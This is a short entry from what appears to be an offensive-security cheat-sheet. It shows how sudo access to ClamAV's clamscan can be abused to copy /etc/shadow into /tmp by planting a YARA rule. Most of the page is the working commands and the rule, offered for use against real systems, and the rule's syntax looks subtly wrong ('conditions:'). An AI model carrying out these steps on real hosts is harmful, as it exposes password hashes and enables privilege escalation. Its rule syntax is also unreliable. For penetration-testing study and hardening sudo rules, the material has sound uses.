Sudo ClamAV Privilege Escalation

Sudo clamscan command might be vulnerable to privilege escalation (PrivEsc).

Investigation

If we can execute “clamscan” command as root as below,

sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/results
Copied!

we can read sensitive files by applying the custom yara rule.

Exploitation

1. Create a Yara Rule

First off, check the location in which the yara file can be created.

find / -name "clam*" 2>/dev/null
Copied!

For instance, assume we can create the yara file under /var/lib/clamav/. Create the yara rule in there. Assume we want to read /etc/shadow, so specify the string “root” because the /etc/shadow contains “root” user name.

# /var/lib/clamav/test.yara
rule test
{
  strings:
    $string = "root"
  conditions:
    $string
}
Copied!

2. Execute ClamScan

Now execute "clamscan" as root.

sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/results
Copied!

We can see /etc/shadow under /tmp/results.

PreviousSnapd Privilege Escalation NextSudo Dstat Privilege Escalation

Last updated 2 years ago

hashtagInvestigationarrow-up-right

hashtagExploitationarrow-up-right

hashtag1. Create a Yara Rulearrow-up-right

hashtag2. Execute ClamScanarrow-up-right

Investigation

Exploitation

1. Create a Yara Rule

2. Execute ClamScan